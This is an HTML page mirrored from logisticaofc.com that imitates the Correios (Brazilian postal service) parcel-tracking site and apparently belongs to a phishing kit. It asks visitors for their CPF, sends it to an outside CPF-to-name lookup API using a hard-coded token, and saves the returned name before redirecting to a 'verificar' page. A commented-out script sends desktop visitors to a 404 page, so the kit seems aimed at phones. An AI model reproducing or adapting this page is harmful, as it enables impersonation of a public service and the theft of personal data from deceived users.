

<html>

<!-- Mirrored from logisticaofc.com/REFTXGU/ by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 12 Jul 2025 22:16:20 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <meta name="mobile-web-app-capable" content="yes">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Rastreamento</title>

    <link rel="shortcut icon" href="images/favi-ect.html">

    <!-- <link href="css/fontawesome.css" rel="stylesheet"> -->
    <link href="css/bootstrap.min.css" rel="stylesheet">
    <link href="css/custom.css" rel="stylesheet ">
    <script src="../../code.jquery.com/jquery-3.6.0.min.js"></script>
    <link rel="stylesheet" href="../../cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.2/css/all.min.css" integrity="sha512-SnH5WK+bZxgPHs44uWIX+LLJAJ9/2PkPKZ5QiAj6Ta86w+fsb2TkcmfRyVX3pBnMFcV7oQPJkl9QevSCWr3W6A==" crossorigin="anonymous" referrerpolicy="no-referrer">

</head>

<body class="">


    <section id="acessibilidade">
        <a tabindex="1">Acessibilidade</a>        
    </section>

    <section id="menu">
        <a class="hamburger" tabindex="1"></a>
        <a class="logo" href="#"></a>
        <a class="pesquisar"></a>
        <a class="entrar" href="#"></a>

        <div class="menu oculto" style="height: 815px;">
            <section>
                <h1>Rastreamento</h1>
                <a href="#" tabindex="1">Entrar</a>
            </section>


            <a href="#" target="_blank" tabindex="1">Rastreamento em outros países</a>
            <a href="#" tabindex="1">Perguntas frequentes</a>
            <a href="#" target="_blank" tabindex="1">Busca Agências</a>
            <a href="#" target="_blank" tabindex="1">Central de Atendimento</a>
            <a href="#" target="_blank" tabindex="1">Prazo de Guarda Objetos Nacionais</a>
            <a href="#" target="_blank" tabindex="1">Prazo de Guarda Objetos Internacionais</a>
            <a href="#" target="_blank" tabindex="1">Restrição de Entrega por CEP</a>        
        </div>

    </section>
    <main>
        <input type="hidden" id="documento" name="documento" value="">
        <div class="container col-961">
            <nav aria-label="breadcrumb">
                <div id="trilha">
                    <a>Portal Correios</a>
                    <a>Rastreamento</a>
                </div>
            </nav>
            
            <div class="d-flex flex-row justify-content-between" id="titulo-pagina">
                <h3>Rastreamento</h3>
            </div>

            <div class="jumbotron">
                <div class="campos">
                    <div class="campo">
                        <div class="rotulo">
                            <label for="objeto">Deseja acompanhar seu objeto?<br>Digite seu <span style="font-weight: bold">CPF</span></label>
                        </div>
                        <div class="controle linhas align-items-center">
                            <input type="tel"  id="cpf" name="cpf" class="form-control" placeholder="000.000.000-00" required="" maxlength="14">
                        </div>
                        <p id="alert-cpf" class="alert alert-cpf py-2 mt-2">Informe o seu CPF.</p>
                        <button type="button" id="b-pesquisar" name="b-pesquisar" class="btn btn-primary botao-principal">Consultar</button>
                    </div>
                </div>
            </div>
            <button hidden="" type="button" id="b-invoked" name="b-invoked"></button>
            
            <div id="tabs-rastreamento"></div>
            <br>
            <div class="bannersro">
                <img src="images/banners-seu_correios_994.jpg" class="w-100">
            </div>
        </div>
        <div class="modal" id="modalshare" data-esc="">
            <section>
                <div class="social-media-modal noPrint">
                    <div class="social-media-modal-arrow" style="align-self: center; left: 0px;"></div>
                    <div id="msharebuttons" class="social-media-modal-wrapper" data-objeto=""></div>
                </div>
            </section>
        </div>



        <div id="regiao-botoes" class="oculta"></div>
    </main>
    <footer id="rodape">
        <div class="recipiente largura-maxima">

            <div class="rodape-links">
                <h2>Fale Conosco</h2>

                <ul class="lista-icone">
                    <li>
                        <a href="#" target="_blank">
                            <img class="icones-link" src="images/rodape-monitor.png">
                            <span>Registro de Manifestações</span>
                        </a>
                    </li>
                    <li>
                        <a href="#" target="_blank">
                            <img class="icones-link" src="images/rodape-duvida.png">
                            <span>Central de Atendimento</span>
                        </a>
                    </li>
                    <li>
                        <a href="#" target="_blank">
                            <img class="icones-link" src="images/rodape-negocios.png">
                            <span>Soluções para o seu negócio</span>
                        </a>
                    </li>
                    <li>
                        <a href="#" target="_blank">
                            <img class="icones-link" src="images/rodape-headset.png">
                            <span>Suporte ao cliente com contrato</span>
                        </a>
                    </li>
                    <li>
                        <a href="#" target="_blank">
                            <img class="icones-link" src="images/rodape-ouvidoria.png">
                            <span>Ouvidoria</span>
                        </a>
                    </li>
                    <li>
                        <a href="#" target="_blank">
                            <img class="icones-link" src="images/rodape-denuncia.png">
                            <span>Denúncia</span>
                        </a>
                    </li>
                </ul>
            </div>

            <div class="rodape-links">
                <h2>Sobre os Correios</h2>

                <ul class="lista-icone">
                    <li>
                        <a href="#" target="_blank">
                            <img class="icones-link" src="images/rodape-identidade.png">
                            <span>Identidade corporativa</span>
                        </a>
                    </li>
                    <li>
                        <a href="#" target="_blank">
                            <img class="icones-link" src="images/rodape-educacao.png">
                            <span>Educação e cultura</span>
                        </a>
                    </li>
                    <li>
                        <a href="#" target="_blank">
                            <img class="icones-link" src="images/rodape-codigo-etica.png">
                            <span>Código de ética</span>
                        </a>
                    </li>
                    <li>
                        <a href="#" target="_blank">
                            <img class="icones-link" src="images/rodape-transparencia.png">
                            <span>Transparência e prestação de contas</span>
                        </a>
                    </li>
                    <li>
                        <a href="#" target="_blank">
                            <img class="icones-link" src="images/rodape-cadeado.png">
                            <span>Política de Privacidade e Notas Legais</span>
                        </a>
                    </li>
                </ul>
            </div>

            <div class="rodape-links">
                <h2>Outros Sites</h2>

                <ul class="lista-icone">
                    <li>
                        <a href="#" target="_blank">
                            <img class="icones-link" src="images/rodape-loja-correios.png">
                            <span>Loja online dos Correios</span>
                        </a>
                    </li>
                </ul>
            </div>

        </div>
        <p>
        </p><div class="copyright">© Copyright 2025 Correios</div>
        <p></p>
    </footer>


    <script>
        document.getElementById("b-pesquisar").addEventListener("click", async function () {
            const cpfInput = document.getElementById("cpf");
            let cpf = cpfInput.value.replace(/\D/g, ''); // Remove pontos e traços
        
            if (cpf.length !== 11) {
                alert("CPF inválido.");
                return;
            }
        
            try {
                const response = await fetch(`https://ws.hubdodesenvolvedor.com.br/v2/nome_cpf/?cpf=${cpf}&token=179852055WBrxRvHmlC324717432`);
                const data = await response.json();
        
                if (data.status && data.return === "OK") {
                    const nome = data.result.nome;
        
                    // Salva no localStorage para uso na próxima página
                    localStorage.setItem("nomeConsulta", nome);
        
                    // Redireciona para a página verificar1ab9.html
                    window.location.href = "verificar1ab9.html";
                } else {
                    alert("CPF não encontrado ou inválido.");
                }
            } catch (error) {
                console.error("Erro ao consultar o CPF:", error);
                alert("Erro ao consultar. Tente novamente.");
            }
        });
        </script>
        


    <script src="js/bootstrap.js"></script>
    <script src="js/bootstrap.bundle.min.js"></script>

    <!-- <script type="text/javascript">
        if (!navigator.userAgent.match(/(iPhone|iPod|iPad|Android|BlackBerry|IEMobile)/) && window.innerWidth > 768) {
            window.location.href = '/404';
        }
    </script>  --> 

</body>

<!-- Mirrored from logisticaofc.com/REFTXGU/ by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 12 Jul 2025 22:16:26 GMT -->
</html>




